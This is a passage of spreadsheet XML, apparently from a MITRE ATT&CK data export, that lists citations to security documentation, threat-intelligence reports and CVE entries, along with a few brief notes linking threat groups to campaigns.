    <t>Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). Service Control Manager. Retrieved March 28, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN Syntax (Setspn.exe). Retrieved March 22, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.</t>
  </si>
  <si>
    <t>Marshall, D. &amp; Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2021, September 16). Create a snapshot of a virtual hard disk. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.</t>
  </si>
  <si>
    <t>Lambert, J. (2020, December 13). Important steps for customers to protect themselves from recent nation-state cyberattacks. Retrieved December 17, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.</t>
  </si>
  <si>
    <t>Gerend, J. et al.. (2017, October 16). sxstrace. Retrieved April 26, 2021.</t>
  </si>
  <si>
    <t>Russinovich, M. &amp; Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2018, February 17). Windows System Services Fundamentals. Retrieved March 28, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Registry Values for System-Wide Security. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021.</t>
  </si>
  <si>
    <t>Burt, T. (2020, September 10). New cyberattacks targeting U.S. elections. Retrieved March 24, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Tasklist. Retrieved December 23, 2015.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). Tasks. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.</t>
  </si>
  <si>
    <t>Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2016, June 1). Transport agents. Retrieved June 24, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I. Retrieved December 18, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2014, November 19). Security Considerations for Trusts. Retrieved November 30, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019.</t>
  </si>
  <si>
    <t>Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021.</t>
  </si>
  <si>
    <t>Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.</t>
  </si>
  <si>
    <t>Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018.</t>
  </si>
  <si>
    <t>Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018.</t>
  </si>
  <si>
    <t>Coulter, D. et al.. (2019, April 9). Microsoft recommended block rules. Retrieved August 12, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2014, May 13). Microsoft Security Advisory: Update to improve credentials protection and management. Retrieved June 8, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). WMI Architecture. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2008, September 11). Fun with WMI Filters in Group Policy. Retrieved March 13, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). WMI System Classes. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, June 23). Well-known security identifiers in Windows operating systems. Retrieved November 30, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>MSTIC. (2022, January 15). Destructive malware targeting Ukrainian organizations. Retrieved March 10, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2017, September 15). Backdoor:Win32/Truvasys.A!dha. Retrieved November 30, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Windows Remote Management. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.</t>
  </si>
  <si>
    <t>Gorzelany, A., Hall, J., Poggemeyer, L.. (2019, January 7). Windows Defender Application Control. Retrieved July 16, 2019.</t>
  </si>
  <si>
    <t>Hardy, T. &amp; Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2017, November 9). Backdoor:Win32/Wingbird.A!dha. Retrieved November 27, 2017.</t>
  </si>
  <si>
    <t>Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020.</t>
  </si>
  <si>
    <t>Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using &lt;msxsl:script&gt;. Retrieved July 3, 2018.</t>
  </si>
  <si>
    <t>Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream: Version Dependent Project Information. Retrieved September 18, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2021, May 27). bcdedit. Retrieved June 23, 2021.</t>
  </si>
  <si>
    <t>Jordan Geurten et al. . (2022, March 29). Microsoft recommended driver block rules. Retrieved April 7, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2017, October 16). gpresult. Retrieved August 6, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2017, January 18). ODBCCONF.EXE. Retrieved March 7, 2019.</t>
  </si>
  <si>
    <t>Microsoft TechNet. (n.d.). Runas. Retrieved April 21, 2017.</t>
  </si>
  <si>
    <t>Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved September 9, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2021, August 23). Retrieved August 16, 2021.</t>
  </si>
  <si>
    <t>Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.</t>
  </si>
  <si>
    <t>odzhan. (2019, April 25). Windows Process Injection: WordWarping, Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline. Retrieved November 15, 2021.</t>
  </si>
  <si>
    <t>Red Teaming Experiments. (n.d.). Module Stomping for Shellcode Injection. Retrieved July 14, 2022.</t>
  </si>
  <si>
    <t>Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background Intelligent Transfer Service. Retrieved January 12, 2018.</t>
  </si>
  <si>
    <t>Moran, N., &amp; Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly &amp;#91;Blog&amp;#93;. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Moran, N., Oppenheim, M., Engle, S., &amp; Wartell, R.. (2014, September 3). Darwin’s Favorite APT Group &amp;#91;Blog&amp;#93;. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Moran, B. (2020, November 18). Putting Together the RDPieces. Retrieved October 17, 2022.</t>
  </si>
  <si>
    <t>Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.</t>
  </si>
  <si>
    <t>Cheruku, H. (2020, April 15). LOKIBOT WITH AUTOIT OBFUSCATOR + FRENCHY SHELLCODE. Retrieved May 14, 2020.</t>
  </si>
  <si>
    <t>Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.</t>
  </si>
  <si>
    <t>Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM – CVE-2017-8625. Retrieved October 3, 2018.</t>
  </si>
  <si>
    <t>Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.</t>
  </si>
  <si>
    <t>Thomas, C. (n.d.). Mythc Documentation. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>Thomas, C. (2018, July 4). Mythic. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>Thomas, C. (2020, August 13). A Change of Mythic Proportions. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.</t>
  </si>
  <si>
    <t>Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021.</t>
  </si>
  <si>
    <t>Matthews, M. and Backhouse, W. (2021, June 15). Handy guide to a new Fivehands ransomware variant. Retrieved June 24, 2021.</t>
  </si>
  <si>
    <t>Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.</t>
  </si>
  <si>
    <t>Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.</t>
  </si>
  <si>
    <t>Antenucci, S., Pantazopoulos, N., Sandee, M. (2020, June 23). WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group. Retrieved September 14, 2021.</t>
  </si>
  <si>
    <t>Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020.</t>
  </si>
  <si>
    <t>NCCIC. (2017, February 10). Enhanced Analysis of GRIZZLY STEPPE Activity. Retrieved April 12, 2021.</t>
  </si>
  <si>
    <t>National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.</t>
  </si>
  <si>
    <t>NCSC, CISA, FBI, NSA. (2022, February 23). New Sandworm malware Cyclops Blink replaces VPNFilter. Retrieved March 3, 2022.</t>
  </si>
  <si>
    <t>NCSC. (2022, February 23). Cyclops Blink Malware Analysis Report. Retrieved March 3, 2022.</t>
  </si>
  <si>
    <t>NCSC GCHQ. (2022, January 27). Small Sieve Malware Analysis Report. Retrieved August 22, 2022.</t>
  </si>
  <si>
    <t>The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.</t>
  </si>
  <si>
    <t>NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.</t>
  </si>
  <si>
    <t>Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020.</t>
  </si>
  <si>
    <t>NHS Digital. (2020, October 10). Pysa Ransomware: Another 'big-game hunter' ransomware. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>NHS Digital . (2020, August 20). BLINDINGCAN Remote Access Trojan. Retrieved August 20, 2020.</t>
  </si>
  <si>
    <t>Grassi, P., et al. (2017, December 1). SP 800-63-3, Digital Identity Guidelines. Retrieved January 16, 2019.</t>
  </si>
  <si>
    <t>NIST. (n.d.). Authentication. Retrieved January 30, 2020.</t>
  </si>
  <si>
    <t>NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January 30, 2020.</t>
  </si>
  <si>
    <t>Scarfone, K. et al.. (2008, July). NIST Special Publication 800-123 - Guide to General Server Security. Retrieved July 26, 2018.</t>
  </si>
  <si>
    <t>NJCCIC. (2016, September 27). Ursnif. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t xml:space="preserve"> NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021.</t>
  </si>
  <si>
    <t>NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.</t>
  </si>
  <si>
    <t>NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.</t>
  </si>
  <si>
    <t>NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.</t>
  </si>
  <si>
    <t>National Security Agency/Central Security Service Information Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows Event Log Monitoring. Retrieved September 6, 2018.</t>
  </si>
  <si>
    <t>NSA and ASD. (2020, April 3). Detect and Prevent Web Shell Malware. Retrieved July 23, 2021.</t>
  </si>
  <si>
    <t>NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.</t>
  </si>
  <si>
    <t>The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>Hada, H. (2021, December 28).  Flagpro The new malware used by BlackTech. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.</t>
  </si>
  <si>
    <t>National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.</t>
  </si>
  <si>
    <t>National Vulnerability Database. (2017, June 22). CVE-2017-0176 Detail. Retrieved April 3, 2018.</t>
  </si>
  <si>
    <t>National Vulnerability Database. (2019, October 9). CVE-2019-3610 Detail. Retrieved April 14, 2021.</t>
  </si>
  <si>
    <t>NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' URI for Fileless Persistence. Retrieved April 28, 2020.</t>
  </si>
  <si>
    <t>National Vulnerability Database. (n.d.). National Vulnerability Database. Retrieved October 15, 2020.</t>
  </si>
  <si>
    <t>Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.</t>
  </si>
  <si>
    <t>Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.</t>
  </si>
  <si>
    <t>Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.</t>
  </si>
  <si>
    <t>Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies. Retrieved July 8, 2019.</t>
  </si>
  <si>
    <t>Sutherland, S. (2016, March 7). Maintaining Persistence via SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.</t>
  </si>
  <si>
    <t>ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.</t>
  </si>
  <si>
    <t>Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022.</t>
  </si>
  <si>
    <t>Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022.</t>
  </si>
  <si>
    <t>Malik, A. (2016, October 14). Nitol Botnet makes a resurgence with evasive sandbox analysis technique. Retrieved September 30, 2021.</t>
  </si>
  <si>
    <t>Palazolo, G. (2021, October 7). SquirrelWaffle: New Malware Loader Delivering Cobalt Strike and QakBot. Retrieved August 9, 2022.</t>
  </si>
  <si>
    <t>Sutherland, S. (2014, September 9). 15 Ways to Bypass the PowerShell Execution Policy. Retrieved July 23, 2015.</t>
  </si>
  <si>
    <t>Miller-Osborn, J., Grunzweig, J.. (2015, April). Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets. Retrieved November 4, 2015.</t>
  </si>
  <si>
    <t>Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)</t>
  </si>
  <si>
    <t>Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020.</t>
  </si>
  <si>
    <t>Some sources have discussed Njw0rm as a later variant of [njRAT](https://attack.mitre.org/software/S0385), where Njw0rm adds the ability to spread via removable devices such as USB drives.(Citation: FireEye Njw0rm Aug 2013) Other sources contain that functionality in their description of [njRAT](https://attack.mitre.org/software/S0385) itself.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>ss64. (n.d.). NLTEST.exe - Network Location Test. Retrieved February 14, 2019.</t>
  </si>
  <si>
    <t>Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls and Intrusion Detection Systems. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.</t>
  </si>
  <si>
    <t>Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.</t>
  </si>
  <si>
    <t>Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.</t>
  </si>
  <si>
    <t>Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.</t>
  </si>
  <si>
    <t>Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.</t>
  </si>
  <si>
    <t>Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.</t>
  </si>
  <si>
    <t>Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Remote Administration Tools &amp; Content Staging Malware Report. Retrieved March 16, 2016.</t>
  </si>
  <si>
    <t>Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Tools Report. Retrieved March 10, 2016.</t>
  </si>
  <si>
    <t>Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.</t>
  </si>
  <si>
    <t>Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Microsoft. (2021, November 23). NtQueryInformationProcess function (winternl.h). Retrieved February 4, 2022.</t>
  </si>
  <si>
    <t>Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.</t>
  </si>
  <si>
    <t>Syynimaa, N. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved August 3, 2022.</t>
  </si>
  <si>
    <t>Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Juuso Salonen. (2012, September 5). Breaking into the OS X keychain. Retrieved July 15, 2017.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2018, February 17). Tearing Apart the Undetected (OSX)Coldroot RAT. Retrieved August 8, 2019.</t>
  </si>
  <si>
    <t>Jan Schaumann. (2015, November 5). Using the OS X Keychain to store and retrieve passwords. Retrieved March 31, 2022.</t>
  </si>
  <si>
    <t>Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection &amp; Analysis. Retrieved July 10, 2017.</t>
  </si>
  <si>
    <t>Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits Mackeeper. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.</t>
  </si>
  <si>
    <t>Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016.</t>
  </si>
  <si>
    <t xml:space="preserve"> Albinowax Timo Goosen. (n.d.). CSV Injection. Retrieved February 7, 2022.</t>
  </si>
  <si>
    <t>OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.</t>
  </si>
  <si>
    <t>OWASP Wiki. (2018, February 16). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Sandvik, Runa. (2021, October 1). Made In America: Green Lambert for OS X. Retrieved March 21, 2022.</t>
  </si>
  <si>
    <t>Wardle, P. (2021, November 11). OSX.CDDS (OSX.MacMa). Retrieved June 30, 2022.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2019, October 12). Pass the AppleJeus. Retrieved September 28, 2022.</t>
  </si>
  <si>
    <t>Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.</t>
  </si>
  <si>
    <t>Moe, O. (2018, January 14). Putting Data in Alternate Data Streams and How to Execute It. Retrieved June 30, 2018.</t>
  </si>
  <si>
    <t>Moe, O. (2018, April 11). Putting Data in Alternate Data Streams and How to Execute It - Part 2. Retrieved June 30, 2018.</t>
  </si>
  <si>
    <t>Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.</t>
  </si>
  <si>
    <t>Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018.</t>
  </si>
  <si>
    <t>Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, January 23). (Cloud) Tip of the Day: Advanced way to check domain availability for Office 365 and Azure. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Partners: Offer delegated administration. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2022, March 4). Manage partner relationships. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>Falcone, R. and Lee, B. (2017, July 27). OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat Group. Retrieved January 8, 2018.</t>
  </si>
  <si>
    <t>Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018.</t>
  </si>
  <si>
    <t>Wikipedia. (n.d.). Onion Routing. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Open items automatically when you log in on Mac. Retrieved October 1, 2021.</t>
  </si>
  <si>
    <t>rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017.</t>
  </si>
  <si>
    <t>Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.</t>
  </si>
  <si>
    <t>It is believed that the actors behind [Patchwork](https://attack.mitre.org/groups/G0040) are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013)</t>
  </si>
  <si>
    <t>Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016.</t>
  </si>
  <si>
    <t>Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 4, 2015.</t>
  </si>
  <si>
    <t>Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and the campaign Operation Woolen-Goldfish.(Citation: Check Point Rocket Kitten)(Citation: TrendMicro Operation Woolen Goldfish March 2015)</t>
  </si>
  <si>
    <t>Osanda Malith Jayathissa. (2017, March 24). Places of Interest in Stealing NetNTLM Hashes. Retrieved January 26, 2018.</t>
  </si>
  <si>
    <t>Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018.</t>
  </si>
  <si>
    <t>de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Hegt, S. (2020, March 30). Mark-of-the-Web from a red team’s perspective. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021.</t>
  </si>
  <si>
    <t>N. O'Bryan. (2018, May 30). Managing Outlook Cached Mode and OST File Sizes. Retrieved February 19, 2020.</t>
  </si>
  <si>
    <t>Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019.</t>
  </si>
  <si>
    <t>zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>Fernández, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors &amp; DNS requests. Retrieved June 26, 2020.</t>
  </si>
  <si>
    <t>Palo Alto Networks. (n.d.). What Is DNS Tunneling?. Retrieved March 15, 2020.</t>
  </si>
  <si>
    <t>PCMag. (n.d.). Encyclopedia: double extension. Retrieved August 4, 2021.</t>
  </si>
  <si>
    <t>Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>PLEAD derived its name from letters used in backdoor commands in intrusion campaigns.(Citation: Trend Micro PLEAD RTLO)(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.</t>
  </si>
  <si>
    <t>Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.</t>
  </si>
  <si>
    <t>Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.</t>
  </si>
  <si>
    <t>PT ESC Threat Intelligence. (2020, June 4). COVID-19 and New Year greetings: an investigation into the tools and methods used by the Higaisa group. Retrieved March 2, 2021.</t>
  </si>
  <si>
